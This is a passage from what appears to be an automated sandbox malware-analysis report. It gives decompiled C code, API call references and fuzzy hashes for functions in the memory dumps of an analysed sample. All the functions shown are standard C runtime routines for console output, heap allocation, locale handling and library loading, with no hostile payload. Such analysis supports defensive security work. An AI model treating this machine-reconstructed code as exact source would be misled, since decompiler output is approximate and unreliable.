				_t115 = (_t80 & 0x0000003f) * 0x30;
				_t133 = _a12;
				_v52 = _t133;
				_v48 = _t118;
				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x4130a0 + _t118 * 4)) + _t115 + 0x18));
				_v40 = _a16 + _t133;
				_t86 = GetConsoleCP();
				_t136 = _a4;
				_v60 = _t86;
				 *_t136 = 0;
				 *((intOrPtr*)(_t136 + 4)) = 0;
				 *((intOrPtr*)(_t136 + 8)) = 0;
				while(_t133 < _v40) {
					_v28 = 0;
					_v31 =  *_t133;
					_t129 =  *((intOrPtr*)(0x4130a0 + _v48 * 4));
					_t123 =  *(_t129 + _t115 + 0x2d);
					if((_t123 & 0x00000004) == 0) {
						if(( *(E00405FC6(_t115, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
							_push(1);
							_push(_t133);
							goto L8;
						} else {
							if(_t133 >= _v40) {
								_t131 = _v48;
								 *((char*)( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2e)) =  *_t133;
								 *( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2d) =  *( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2d) | 0x00000004;
								 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
							} else {
								_t111 = E00407222( &_v28, _t133, 2);
								_t139 = _t139 + 0xc;
								if(_t111 != 0xffffffff) {
									_t133 =  &(_t133[1]);
									goto L9;
								}
							}
						}
					} else {
						_t128 = _t123 & 0x000000fb;
						_v16 =  *((intOrPtr*)(_t129 + _t115 + 0x2e));
						_push(2);
						_v15 = _t128;
						 *(_t129 + _t115 + 0x2d) = _t128;
						_push( &_v16);
						L8:
						_push( &_v28);
						_t93 = E00407222();
						_t139 = _t139 + 0xc;
						if(_t93 != 0xffffffff) {
							L9:
							_t133 =  &(_t133[1]);
							_t96 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
							_v56 = _t96;
							if(_t96 != 0) {
								if(WriteFile(_v44,  &_v24, _t96,  &_v36, 0) == 0) {
									L19:
									 *_t136 = GetLastError();
								} else {
									 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 8)) - _v52 + _t133;
									if(_v36 >= _v56) {
										if(_v31 != 0xa) {
											goto L16;
										} else {
											_t104 = 0xd;
											_v32 = _t104;
											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
												goto L19;
											} else {
												if(_v36 >= 1) {
													 *((intOrPtr*)(_t136 + 8)) =  *((intOrPtr*)(_t136 + 8)) + 1;
													 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
					}
					goto L20;
					L16:
				}
				L20:
				E004018CC();
				return _t136;
			}

0x0040822b
0x00408232
0x00408235
0x0040823d
0x00408241
0x0040824d
0x00408250
0x00408253
0x0040825a
0x00408262
0x00408265
0x0040826b
0x00408271
0x00408276
0x00408278
0x0040827b
0x00408280
0x0040828a
0x00408291
0x00408294
0x0040829b
0x004082a2
0x004082ce
0x004082f4
0x004082f6
0x00000000
0x004082d0
0x004082d3
0x0040839a
0x004083a6
0x004083b1
0x004083b6
0x004082d9
0x004082e0
0x004082e5
0x004082eb
0x004082f1
0x00000000
0x004082f1
0x004082eb
0x004082d3
0x004082a4
0x004082a8
0x004082ab
0x004082b1
0x004082b3
0x004082b6
0x004082ba
0x004082f7
0x004082fa
0x004082fb
0x00408300
0x00408306
0x0040830c
0x0040831b
0x00408321
0x00408327
0x0040832c
0x00408348
0x004083bb
0x004083c1
0x0040834a
0x00408352
0x0040835b
0x00408361
0x00000000
0x00408363
0x00408365
0x00408368
0x00408381
0x00000000
0x00408383
0x00408387
0x00408389
0x0040838c
0x00000000
0x0040838c
0x00408387
0x00408381
0x00408361
0x0040835b
0x00408348
0x0040832c
0x00408306
0x00000000
0x0040838f
0x0040838f
0x004083c3
0x004083cd
0x004083d5

APIs

GetConsoleCP.KERNEL32 ref: 00408265
__fassign.LIBCMT ref: 004082E0
__fassign.LIBCMT ref: 004082FB
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 00408321
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00408340
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00408379

Memory Dump Source

Source File: 00000002.00000002.666412273.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 6526cd7982371344a6a1e48cd2b7cf140f34c910ae76ba14c8618a3c70808cc2
Instruction ID: d35ea3bc0149cbeaf608d2e35f82b202305ea3b4574a465905668c698b2cd014
Opcode Fuzzy Hash: 6526cd7982371344a6a1e48cd2b7cf140f34c910ae76ba14c8618a3c70808cc2
Instruction Fuzzy Hash: 2751C070900209EFCB10CFA8D985AEEBBF4EF49300F14816EE995F3391DA349941CB68

Uniqueness

Uniqueness Score: -1.00%

Function 00091738, Relevance: 10.5, APIs: 7, Instructions: 45
threadCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00091738(void* __ebx, void* __edi, void* __eflags) {
				void* __esi;
				void* _t3;
				intOrPtr _t6;
				long _t14;
				long* _t27;

				E00091BC7(_t3);
				if(E00093268() != 0) {
					_t6 = E00092BEF(E00091493);
					 *0xae000 = _t6;
					__eflags = _t6 - 0xffffffff;
					if(_t6 == 0xffffffff) {
						goto L1;
					} else {
						_t27 = E000932EE(1, 0x3bc);
						__eflags = _t27;
						if(_t27 == 0) {
							L6:
							E000917AE();
							__eflags = 0;
							return 0;
						} else {
							__eflags = E00092C4B( *0xae000, _t27);
							if(__eflags == 0) {
								goto L6;
							} else {
								_push(0);
								_push(_t27);
								E00091685(__ebx, __edi, _t27, __eflags);
								_t14 = GetCurrentThreadId();
								_t27[1] = _t27[1] | 0xffffffff;
								 *_t27 = _t14;
								__eflags = 1;
								return 1;
							}
						}
					}
				} else {
					L1:
					E000917AE();
					return 0;
				}
			}

APIs

__init_pointers.LIBCMT ref: 00091738

Part of subcall function 00091BC7: EncodePointer.KERNEL32(00000000,?,0009173D,0009112C,000ACCC0,00000014), ref: 00091BCA
Part of subcall function 00091BC7: __initp_misc_winsig.LIBCMT ref: 00091BE5
Part of subcall function 00091BC7: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00092DAE
Part of subcall function 00091BC7: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00092DC2
Part of subcall function 00091BC7: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00092DD5
Part of subcall function 00091BC7: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00092DE8
Part of subcall function 00091BC7: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00092DFB
Part of subcall function 00091BC7: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00092E0E
Part of subcall function 00091BC7: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00092E21
Part of subcall function 00091BC7: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00092E34
Part of subcall function 00091BC7: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00092E47
Part of subcall function 00091BC7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00092E5A
Part of subcall function 00091BC7: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00092E6D
Part of subcall function 00091BC7: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00092E80
Part of subcall function 00091BC7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00092E93
Part of subcall function 00091BC7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00092EA6
Part of subcall function 00091BC7: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00092EB9
Part of subcall function 00091BC7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00092ECC

__mtinitlocks.LIBCMT ref: 0009173D
__mtterm.LIBCMT ref: 00091746

Part of subcall function 000917AE: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,0009174B,0009112C,000ACCC0,00000014), ref: 00093182
Part of subcall function 000917AE: _free.LIBCMT ref: 00093189
Part of subcall function 000917AE: DeleteCriticalSection.KERNEL32(000AE058,?,?,0009174B,0009112C,000ACCC0,00000014), ref: 000931AB

__calloc_crt.LIBCMT ref: 0009176B
__initptd.LIBCMT ref: 0009178D
GetCurrentThreadId.KERNEL32 ref: 00091794

Memory Dump Source

Source File: 00000002.00000002.666197899.0000000000091000.00000020.00020000.sdmp, Offset: 00090000, based on PE: true

Associated: 00000002.00000002.666178246.0000000000090000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.666272435.00000000000A8000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.666298261.00000000000AE000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.666388011.00000000000F2000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
String ID:
API String ID: 3567560977-0
Opcode ID: f9bb779cb84ca5b0124311b4e3fba90ebad4e03ed4bea8aa2156cc4e0c14f25c
Instruction ID: f523af66e95df6526ad77a22eabbf74b38ed8b487b10ca64d22ad3eb7b9f47ce
Opcode Fuzzy Hash: f9bb779cb84ca5b0124311b4e3fba90ebad4e03ed4bea8aa2156cc4e0c14f25c
Instruction Fuzzy Hash: 14F06D32B1C7132DFE747BB4AC076CA66E59F42730B200A2AF450C80E2FF108841A554

Uniqueness

Uniqueness Score: -1.00%

Function 0009879C, Relevance: 9.0, APIs: 6, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E0009879C(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t10;
				signed int _t12;
				intOrPtr* _t16;
				intOrPtr* _t31;
				void* _t32;

				_push(8);
				_push(0xacf60);
				_t10 = E000927F0(__ebx, __edi, __esi);
				_t31 =  *((intOrPtr*)(_t32 + 8));
				if(_t31 != 0) {
					_t12 = E00093117(0xd);
					 *(_t32 - 4) =  *(_t32 - 4) & 0x00000000;
					if( *((intOrPtr*)(_t31 + 4)) != 0) {
						asm("lock xadd [ecx], eax");
						if((_t12 | 0xffffffff) == 0 &&  *((intOrPtr*)(_t31 + 4)) != 0xae5b0) {
							E000932B6( *((intOrPtr*)(_t31 + 4)));
						}
					}
					 *(_t32 - 4) = 0xfffffffe;
					E00098DC1();
					if( *_t31 != 0) {
						E00093117(0xc);
						 *(_t32 - 4) = 1;
						E0009363B( *_t31);
						_t16 =  *_t31;
						if(_t16 != 0 &&  *_t16 == 0 && _t16 != 0xae2e8) {
							E000934E1(_t16);
						}
						 *(_t32 - 4) = 0xfffffffe;
						E00098DCD();
					}
					_t10 = E000932B6(_t31);
				}
				return E00092835(_t10);
			}

APIs

__lock.LIBCMT ref: 00098D38

Part of subcall function 00093117: __mtinitlocknum.LIBCMT ref: 00093129
Part of subcall function 00093117: __amsg_exit.LIBCMT ref: 00093135
Part of subcall function 00093117: EnterCriticalSection.KERNEL32(00000000,?,000916CE,0000000D), ref: 00093142

_free.LIBCMT ref: 00098D5E

Part of subcall function 000932B6: HeapFree.KERNEL32(00000000,00000000,?,00091676,00000000,0009419B,000A58A9,00000000,?,000A3A68,00000000,00010000,00030000,?,000A0BB7), ref: 000932CA
Part of subcall function 000932B6: GetLastError.KERNEL32(00000000,?,00091676,00000000,0009419B,000A58A9,00000000,?,000A3A68,00000000,00010000,00030000,?,000A0BB7), ref: 000932DC

__lock.LIBCMT ref: 00098D77
___removelocaleref.LIBCMT ref: 00098D86
___freetlocinfo.LIBCMT ref: 00098D9F
_free.LIBCMT ref: 00098DB2

Memory Dump Source

Source File: 00000002.00000002.666197899.0000000000091000.00000020.00020000.sdmp, Offset: 00090000, based on PE: true

Associated: 00000002.00000002.666178246.0000000000090000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.666272435.00000000000A8000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.666298261.00000000000AE000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.666388011.00000000000F2000.00000002.00020000.sdmp Download File

Similarity

API ID: __lock_free$CriticalEnterErrorFreeHeapLastSection___freetlocinfo___removelocaleref__amsg_exit__mtinitlocknum
String ID:
API String ID: 626533743-0
Opcode ID: 1e448fa958a5f00f155cebfdd84c875f69fa7854ada8d6ffe4d2348423fda6f9
Instruction ID: fbce04c7524830cdfee10fd8e8e1933519bdb381f3d3d7d163f2479a600d110c
Opcode Fuzzy Hash: 1e448fa958a5f00f155cebfdd84c875f69fa7854ada8d6ffe4d2348423fda6f9
Instruction Fuzzy Hash: DD019231507700EAEFB8ABA4D806799B3E05F12721F24851DF4A4663D2DF748A80FB00

Uniqueness

Uniqueness Score: -1.00%

Function 00403632, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 27%

			E00403632(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _t10;
				int _t12;
				int _t18;
				signed int _t20;

				_t10 =  *0x412014; // 0x2327c9ba
				_v8 = _t10 ^ _t20;
				_v12 = _v12 & 0x00000000;
				_t12 =  &_v12;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t12, __ecx, __ecx);
				if(_t12 != 0) {
					_t12 = GetProcAddress(_v12, "CorExitProcess");
					_t18 = _t12;
					if(_t18 != 0) {
						E0040C15C();
						_t12 =  *_t18(_a4);
					}
				}
				if(_v12 != 0) {
					_t12 = FreeLibrary(_v12);
				}
				E004018CC();
				return _t12;
			}

0x00403639
0x00403640
0x00403643
0x00403647
0x00403652
0x0040365a
0x00403665
0x0040366b
0x0040366f
0x00403676
0x0040367c
0x0040367c
0x0040367e
0x00403683
0x00403688
0x00403688
0x00403693
0x0040369b

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00403627,00000003,?,004035C7,00000003,00410EB8,0000000C,004036DA,00000003,00000002), ref: 00403652
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00403665
FreeLibrary.KERNEL32(00000000,?,?,?,00403627,00000003,?,004035C7,00000003,00410EB8,0000000C,004036DA,00000003,00000002,00000000), ref: 00403688

Strings

mscoree.dll, xrefs: 0040364B
CorExitProcess, xrefs: 0040365D

Memory Dump Source

Source File: 00000002.00000002.666412273.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 829d2906a4e1aa3164176bf7ab706f29f81f0af0ee9c7b1f46b6600de564c79c
Instruction ID: 2a5f1b52f49e2644cdc997ca28138b4c7ff7fe3d24fc8903f8dd75b8825c5772
Opcode Fuzzy Hash: 829d2906a4e1aa3164176bf7ab706f29f81f0af0ee9c7b1f46b6600de564c79c
Instruction Fuzzy Hash: D7F0A431A0020CFBDB109FA1DD49B9EBFB9EB04711F00427AF805B22A0DB754A40CA98

Uniqueness

Uniqueness Score: -1.00%

Function 004062B8, Relevance: 7.6, APIs: 5, Instructions: 110
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E004062B8(void* __edx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
				signed int _v8;
				int _v12;
				char _v16;
				intOrPtr _v24;
				char _v28;
				void* _v40;
				void* __ebx;
				void* __edi;
				signed int _t34;
				signed int _t40;
				int _t45;
				int _t52;
				void* _t53;
				void* _t55;
				int _t57;
				signed int _t63;
				int _t67;
				short* _t71;
				signed int _t72;
				short* _t73;

				_t34 =  *0x412014; // 0x2327c9ba
				_v8 = _t34 ^ _t72;
				_push(_t53);
				E00403F2B(_t53,  &_v28, __edx, _a4);
				_t57 = _a24;
				if(_t57 == 0) {
					_t52 =  *(_v24 + 8);
					_t57 = _t52;
					_a24 = _t52;
				}
				_t67 = 0;
				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
				_v12 = _t40;
				if(_t40 == 0) {
					L15:
					if(_v16 != 0) {
						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
					}
					E004018CC();
					return _t67;
				}
				_t55 = _t40 + _t40;
				_t17 = _t55 + 8; // 0x8
				asm("sbb eax, eax");
				if((_t17 & _t40) == 0) {
					_t71 = 0;
					L11:
					if(_t71 != 0) {
						E00402460(_t67, _t71, _t67, _t55);
						_t45 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t71, _v12);
						if(_t45 != 0) {
							_t67 = GetStringTypeW(_a8, _t71, _t45, _a20);
						}
					}
					L14:
					E004063D5(_t71);
					goto L15;
				}
				_t20 = _t55 + 8; // 0x8
				asm("sbb eax, eax");
				_t47 = _t40 & _t20;
				_t21 = _t55 + 8; // 0x8
				_t63 = _t21;
				if((_t40 & _t20) > 0x400) {
					asm("sbb eax, eax");
					_t71 = E00403E3D(_t63, _t47 & _t63);
					if(_t71 == 0) {
						goto L14;
					}
					 *_t71 = 0xdddd;
					L9:
					_t71 =  &(_t71[4]);
					goto L11;
				}
				asm("sbb eax, eax");
				E004018E0();
				_t71 = _t73;
				if(_t71 == 0) {
					goto L14;
				}
				 *_t71 = 0xcccc;
				goto L9;
			}

0x004062c0
0x004062c7
0x004062ca
0x004062d3
0x004062d8
0x004062dd
0x004062e2
0x004062e5
0x004062e7
0x004062e7
0x004062ec
0x00406305
0x0040630b
0x00406310
0x004063af
0x004063b3
0x004063b8
0x004063b8
0x004063cc
0x004063d4
0x004063d4
0x00406316
0x00406319
0x0040631e
0x00406322
0x0040636e
0x00406370
0x00406372
0x00406377
0x0040638e
0x00406396
0x004063a6
0x004063a6
0x00406396
0x004063a8
0x004063a9
0x00000000
0x004063ae
0x00406324
0x00406329
0x0040632b
0x0040632d
0x0040632d
0x00406335
0x00406352
0x0040635c
0x00406361
0x00000000
0x00000000
0x00406363
0x00406369
0x00406369
0x00000000
0x00406369
0x00406339
0x0040633d
0x00406342
0x00406346
0x00000000
0x00000000
0x00406348
0x00000000

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000100,?,00000000,?,?,00000000), ref: 00406305
__alloca_probe_16.LIBCMT ref: 0040633D
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0040638E
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 004063A0
__freea.LIBCMT ref: 004063A9

Part of subcall function 00403E3D: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F

Memory Dump Source

Source File: 00000002.00000002.666412273.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
String ID:
API String ID: 313313983-0
Opcode ID: 3668a24b8cc91a8edc8bb6444902db7ad8a914eb3222a5b1c35fe0f4f695b84c
Instruction ID: a1348b344bfdb8beedea85c2379656fd8e164ea4191dcb9080565a587d22e55f
Opcode Fuzzy Hash: 3668a24b8cc91a8edc8bb6444902db7ad8a914eb3222a5b1c35fe0f4f695b84c
Instruction Fuzzy Hash: AE31B072A0020AABDF249F65DC85DAF7BA5EF40310B05423EFC05E6290E739CD65DB94

Uniqueness

Uniqueness Score: -1.00%

Function 000959FE, Relevance: 7.6, APIs: 5, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E000959FE(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
				void* _t7;
				long _t8;
				intOrPtr* _t9;
				intOrPtr* _t12;
				long _t20;
				long _t31;

				if(_a4 != 0) {
					_t31 = _a8;
					__eflags = _t31;
					if(_t31 != 0) {
						_push(__ebx);
						while(1) {
							__eflags = _t31 - 0xffffffe0;
							if(_t31 > 0xffffffe0) {
								break;
							}
							__eflags = _t31;
							if(_t31 == 0) {
								_t31 = _t31 + 1;
								__eflags = _t31;
							}
							_t7 = HeapReAlloc( *0xefd1c, 0, _a4, _t31);
							_t20 = _t7;
							__eflags = _t20;
							if(_t20 != 0) {
								L17:
								_t8 = _t20;
							} else {
								__eflags =  *0xf0a40 - _t7;
								if(__eflags == 0) {
									_t9 = E00094196(__eflags);
									 *_t9 = E000941EF(GetLastError());
									goto L17;
								} else {
									__eflags = E0009455B(_t7, _t31);
									if(__eflags == 0) {
										_t12 = E00094196(__eflags);
										 *_t12 = E000941EF(GetLastError());
										L12:
										_t8 = 0;
										__eflags = 0;
									} else {
										continue;
									}
								}
							}
							goto L14;
						}
						E0009455B(_t6, _t31);
						 *((intOrPtr*)(E00094196(__eflags))) = 0xc;
						goto L12;
					} else {
						E000932B6(_a4);
						_t8 = 0;
					}
					L14:
					return _t8;
				} else {
					return E0009596C(__ebx, __edx, __edi, _a8);
				}
			}

APIs

_malloc.LIBCMT ref: 00095A0A

Part of subcall function 0009596C: __FF_MSGBANNER.LIBCMT ref: 00095983
Part of subcall function 0009596C: __NMSG_WRITE.LIBCMT ref: 0009598A
Part of subcall function 0009596C: HeapAlloc.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,0009334C,00000000,00000000,00000000,00000000,?,00093201,00000018,000ACDB0), ref: 000959AF

_free.LIBCMT ref: 00095A1D

Memory Dump Source

Source File: 00000002.00000002.666197899.0000000000091000.00000020.00020000.sdmp, Offset: 00090000, based on PE: true

Associated: 00000002.00000002.666178246.0000000000090000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.666272435.00000000000A8000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.666298261.00000000000AE000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.666388011.00000000000F2000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocHeap_free_malloc
String ID:
API String ID: 2734353464-0
Opcode ID: dd909db95a92bd5af9694876447f1d933b4fdd946849ecf6ab766cd93eccd6cc
Instruction ID: 1553e9ff81819ab1d4e1e770a093666b30eab558416d13de368e2a317615a408
Opcode Fuzzy Hash: dd909db95a92bd5af9694876447f1d933b4fdd946849ecf6ab766cd93eccd6cc
Instruction Fuzzy Hash: 5F115C31404E11AFDF726F71AC45EAE37D4AF14362F104625F9099A153EF348D41B799

Uniqueness

Uniqueness Score: -1.00%

Function 0009F3F6, Relevance: 6.1, APIs: 4, Instructions: 97
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0009F3F6(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				intOrPtr _v12;
				int _v20;
				int _t35;
				int _t38;
				intOrPtr* _t44;
				int _t47;
				short* _t49;
				intOrPtr _t50;
				intOrPtr _t54;
				int _t55;
				int _t59;
				char* _t62;

				_t62 = _a8;
				if(_t62 == 0) {
					L5:
					return 0;
				}
				_t50 = _a12;
				if(_t50 == 0) {
					goto L5;
				}
				if( *_t62 != 0) {
					E000937C4( &_v20, _a16);
					_t35 = _v20;
					__eflags =  *(_t35 + 0xa8);
					if( *(_t35 + 0xa8) != 0) {
						_t38 = E0009F121( *_t62 & 0x000000ff,  &_v20);
						__eflags = _t38;
						if(_t38 == 0) {
							__eflags = _a4;
							_t59 = 1;
							__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
							if(__eflags != 0) {
								L21:
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t31 = _t54 + 0x70;
									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t31;
								}
								return _t59;
							}
							L20:
							_t44 = E00094196(__eflags);
							_t59 = _t59 | 0xffffffff;
							__eflags = _t59;
							 *_t44 = 0x2a;
							goto L21;
						}
						_t59 = _v20;
						__eflags =  *(_t59 + 0x74) - 1;
						if( *(_t59 + 0x74) <= 1) {
							L15:
							__eflags = _t50 -  *(_t59 + 0x74);
							L16:
							if(__eflags < 0) {
								goto L20;
							}
							__eflags = _t62[1];
							if(__eflags == 0) {
								goto L20;
							}
							L18:
							_t59 =  *(_t59 + 0x74);
							goto L21;
						}
						__eflags = _t50 -  *(_t59 + 0x74);
						if(__eflags < 0) {
							goto L16;
						}
						__eflags = _a4;
						_t47 = MultiByteToWideChar( *(_t59 + 4), 9, _t62,  *(_t59 + 0x74), _a4, 0 | _a4 != 0x00000000);
						_t59 = _v20;
						__eflags = _t47;
						if(_t47 != 0) {
							goto L18;
						}
						goto L15;
					}
					_t55 = _a4;
					__eflags = _t55;
					if(_t55 != 0) {
						 *_t55 =  *_t62 & 0x000000ff;
					}
					_t59 = 1;
					goto L21;
				}
				_t49 = _a4;
				if(_t49 != 0) {
					 *_t49 = 0;
				}
				goto L5;
			}

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0009F42C
__isleadbyte_l.LIBCMT ref: 0009F45A
MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,00000001,00000000,00000000), ref: 0009F488
MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,00000001,00000000,00000000), ref: 0009F4BE

Memory Dump Source

Source File: 00000002.00000002.666197899.0000000000091000.00000020.00020000.sdmp, Offset: 00090000, based on PE: true

Associated: 00000002.00000002.666178246.0000000000090000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.666272435.00000000000A8000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.666298261.00000000000AE000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.666388011.00000000000F2000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 3df1b00145f12a4512da01488e1d6a11e37ff5d115a60e4c71a3c1b68d74b90c
Instruction ID: 7f8a3c4fb2c549e0fe49e2a640808703a2f57b49dcae0c383259daf0d6299c63
Opcode Fuzzy Hash: 3df1b00145f12a4512da01488e1d6a11e37ff5d115a60e4c71a3c1b68d74b90c
Instruction Fuzzy Hash: 8F318A31604247ABDF218E65D884BBB7BF5FF41320F158539E864DB1A1E730E891EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00405751, Relevance: 6.1, APIs: 4, Instructions: 52
libraryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00405751(signed int _a4) {
				signed int _t9;
				void* _t13;
				signed int _t15;
				WCHAR* _t22;
				signed int _t24;
				signed int* _t25;
				void* _t27;

				_t9 = _a4;
				_t25 = 0x412fc8 + _t9 * 4;
				_t24 =  *_t25;
				if(_t24 == 0) {
					_t22 =  *(0x40cd48 + _t9 * 4);
					_t27 = LoadLibraryExW(_t22, 0, 0x800);
					if(_t27 != 0) {
						L8:
						 *_t25 = _t27;
						if( *_t25 != 0) {
							FreeLibrary(_t27);
						}
						_t13 = _t27;
						L11:
						return _t13;
					}
					_t15 = GetLastError();
					if(_t15 != 0x57) {
						_t27 = 0;
					} else {
						_t15 = LoadLibraryExW(_t22, _t27, _t27);
						_t27 = _t15;
					}
					if(_t27 != 0) {
						goto L8;
					} else {
						 *_t25 = _t15 | 0xffffffff;
						_t13 = 0;
						goto L11;
					}
				}
				_t4 = _t24 + 1; // 0x2327c9bb
				asm("sbb eax, eax");
				return  ~_t4 & _t24;
			}

0x00405756
0x0040575a
0x00405761
0x00405765
0x00405773
0x00405789
0x0040578d
0x004057b6
0x004057b8
0x004057bc
0x004057bf
0x004057bf
0x004057c5
0x004057c7
0x00000000
0x004057c8
0x0040578f
0x00405798
0x004057a7
0x0040579a
0x0040579d
0x004057a3
0x004057a3
0x004057ab
0x00000000
0x004057ad
0x004057b0
0x004057b2
0x00000000
0x004057b2
0x004057ab
0x00405767
0x0040576c
0x00000000

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue), ref: 00405783
GetLastError.KERNEL32(?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue,0040D200,0040D208,00000000,00000364,?,004043F2), ref: 0040578F
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue,0040D200,0040D208,00000000), ref: 0040579D

Memory Dump Source

Source File: 00000002.00000002.666412273.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 179fc24cb71fa7b74b78db1aa8efd8080a6824dbe4e2c3e4e777693639d287a7
Instruction ID: a071a87d579bf16c10ed97f701b3afe57148fc5a73c01e838bdae708b7fec84a
Opcode Fuzzy Hash: 179fc24cb71fa7b74b78db1aa8efd8080a6824dbe4e2c3e4e777693639d287a7
Instruction Fuzzy Hash: 2001AC36612622DBD7214BA89D84E577BA8EF45B61F100635FA05F72C0D734D811DEE8

Uniqueness

Uniqueness Score: -1.00%

Function 00404320, Relevance: 6.0, APIs: 4, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E00404320(void* __ebx, void* __ecx, void* __edx) {
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				void* _t3;
				void* _t4;
				intOrPtr _t9;
				void* _t11;
				void* _t20;
				void* _t21;
				void* _t23;
				void* _t25;
				void* _t27;
				void* _t29;
